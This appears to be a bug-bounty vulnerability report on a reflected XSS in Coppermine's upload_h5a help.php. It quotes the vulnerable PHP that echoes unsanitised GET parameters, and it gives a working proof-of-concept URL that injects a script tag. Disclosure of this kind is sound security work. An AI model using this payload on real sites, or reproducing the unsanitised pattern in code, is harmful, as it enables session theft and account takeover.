✍️ Description

Coppermine is vulnerable to XSS attacks on /plugins/upload_h5a/help.php because it doesnt sanitize user supplied parameters as shown below.
Vulnerable variable: t Method: GET
The $styles variable is constructed using the user supplied data, and then is echo in the response.

$styles = '../../themes/'.$_GET['t'].'/style.css';
$hpath = 'help/'.$_GET['g'].'/';
$lang = $_GET['l'];
$hfile = file_exists($hpath.$lang.'.html') ? $lang.'.html' : 'english.html';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="<?php echo $styles; ?>">

🕵️‍♂️ Proof of Concept

In a browser do a request where coppermine is installed, in this case is /cpg16x/:

http://localhost/cpg16x/plugins/upload_h5a/help.php?t=1%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Observe the XSS.

💥 Impact

According to netsparker:

The impact can  lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account